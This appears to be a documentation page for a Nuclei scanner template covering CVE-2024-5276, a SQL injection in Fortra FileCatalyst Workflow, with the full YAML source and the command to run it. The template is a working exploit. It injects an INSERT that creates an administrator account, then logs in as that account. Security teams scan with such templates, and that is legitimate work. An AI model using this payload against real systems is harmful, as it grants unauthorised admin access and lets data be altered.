Fortra FileCatalyst Workflow <= v5.1.6 - SQL Injection
ID: CVE-2024-5276
Severity: critical
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2024,sqli,auth-bypass,fortra,filecatalyst,instrusive,sqli
Description
Section titled “Description”A SQL Injection vulnerability in Fortra FileCatalyst Workflow allows an attacker to modify application data. Likely impacts include creation of administrative users and deletion or modification of data in the application database. Data exfiltration via SQL injection is not possible using this vulnerability. Successful unauthenticated exploitation requires a Workflow system with anonymous access enabled, otherwise an authenticated user is required. This issue affects all versions of FileCatalyst Workflow from 5.1.6 Build 135 and earlier.
YAML Source
Section titled “YAML Source”id: CVE-2024-5276
info: name: Fortra FileCatalyst Workflow <= v5.1.6 - SQL Injection author: iamnoooob,rootxharsh,pdresearch severity: critical description: | A SQL Injection vulnerability in Fortra FileCatalyst Workflow allows an attacker to modify application data. Likely impacts include creation of administrative users and deletion or modification of data in the application database. Data exfiltration via SQL injection is not possible using this vulnerability. Successful unauthenticated exploitation requires a Workflow system with anonymous access enabled, otherwise an authenticated user is required. This issue affects all versions of FileCatalyst Workflow from 5.1.6 Build 135 and earlier. reference: - https://www.tenable.com/security/research/tra-2024-25 - https://support.fortra.com/filecatalyst/kb-articles/advisory-6-24-2024-filecatalyst-workflow-sql-injection-vulnerability-YmYwYWY4OTYtNTUzMi1lZjExLTg0MGEtNjA0NWJkMDg3MDA0 - https://www.fortra.com/security/advisory/fi-2024-008 - https://nvd.nist.gov/vuln/detail/CVE-2024-5276 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-5276 cwe-id: CWE-20 epss-score: 0.00198 epss-percentile: 0.57788 metadata: max-request: 6 verified: true fofa-query: body="FileCatalyst file transfer solution, easily transfer large files" tags: cve,cve2024,sqli,auth-bypass,fortra,filecatalyst,instrusive,sqli
variables: ctxpath: "workflow" username: "{{randstr}}" password: '{{randstr_2}}' password_enc: "{{to_upper(md5(password))}}" payload: "1';INSERT INTO DOCTERA_USERS (USERNAME, PASSWORD, ENCPASSWORD, FIRSTNAME, LASTNAME, COMPANY, ADDRESS, ADDRESS2, CITY, STATE, ALTPHONE, ZIP, COUNTRY, PHONE, FAX, EMAIL, LASTLOGIN, CREATION, PREFERREDSERVER, CREDITCARDTYPE, CREDITCARDNUMBER, CREDITCARDEXPIRY, ACCOUNTSTATUS, USERTYPE, COMMENT, ADMIN, SUPERADMIN, ACCEPTEMAIL, ALLOWHOTFOLDER, PROTOCOL, BANDWIDTH, DIRECTORY, SLOWSTARTRATE, USESLOWSTART, SLOWSTARTAGGRESSIONRATE, BLOCKSIZE, UNITSIZE, NUMENCODERS, NUMFTPSTREAMS, ALLOWUSERBANDWIDTHTUNING, EXPIRYDATE, ALLOWTEMPACCOUNTCREATION, OWNERUSERNAME, USERLEVEL, UPLOADMETHOD, PW_CHANGEABLE, PW_CREATIONDATE, PW_DAYSBEFOREEXPIRE, PW_MUSTCHANGE, PW_USEDPASSWORDS, PW_NUMERRORS) VALUES('{{to_lower(username)}}', NULL, '{{password_enc}}', '{{to_lower(username)}}FirstName', '{{to_lower(username)}}LastName', '', '', '', '', '', '', '', '', '202-404-2400', '', '{{to_lower(username)}}@mydomain.local', 1714014839723, 1714013661166, 'default', '', '', '', 'full access', '', '', 1, 0, 0, 0, 'DEFAULT', '0', 0, '0', 1, '', '', '', '', '', 0, 0, 0, '', 0, 'DEFAULT', 0, 1714014752270, -1, 0, NULL, 0);-- -"
http: - raw: - | GET /{{ctxpath}}/ HTTP/1.1 Host: {{Hostname}}
extractors: - type: regex part: body group: 1 name: jsessionid regex: - 'logon.jsp;jsessionid=([A-Z0-9]+)' internal: true
- raw: - | GET /{{ctxpath}}/jsp/logon.jsp;jsessionid={{jsessionid}} HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - 'logonAnonymous.do' internal: true
extractors: - type: regex part: body group: 1 name: anonurl regex: - 'href="(.*)" class="btn btn-outline-primary" id="logonAnonymousLink"' internal: true
- raw: - | GET {{anonurl}} HTTP/1.1 Host: {{Hostname}}
- raw: - | GET /{{ctxpath}}/servlet/pdf_servlet?JOBID={{urlencode(payload)}} HTTP/1.1 Host: {{Hostname}}
- raw: - | GET /{{ctxpath}}/jsp/logon.jsp HTTP/1.1 Host: {{Hostname}}
disable-cookie: true extractors: - type: regex part: body group: 1 name: fcweb_token regex: - 'name="FCWEB.FORM.TOKEN" value="([A-Za-z0-9]+)"' internal: true
- type: regex part: body group: 1 name: jsessionid2 regex: - 'logon.jsp;jsessionid=([A-Z0-9]+)' internal: true
- raw: - | POST /{{ctxpath}}/logon.do HTTP/1.1 Host: {{Hostname}} Cookie: JSESSIONID={{jsessionid2}} Content-Type: application/x-www-form-urlencoded
FCWEB.FORM.TOKEN={{fcweb_token}}&username={{to_lower(username)}}&password={{password}}&submit=Login&
disable-cookie: true matchers-condition: and matchers: - type: word part: body words: - 'username/password are not correct' - 'Your session timed out.' negative: true
- type: word part: body words: - '<title>FileCatalyst Workflow Administration</title>' - '{{to_lower(username)}}' condition: and
extractors: - type: dsl dsl: - '"USER: "+ username' - '"PASS: "+ password'# digest: 490a00463044022004afd1c150937cfea2b43926d2dd2ef13a3251edca6209b8b81b6aa8fd99f0a202202ea9f47405e6fbc7fbc258833a3155c9bac8fa9ec667c820f581859cd2af0243:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-5276.yaml"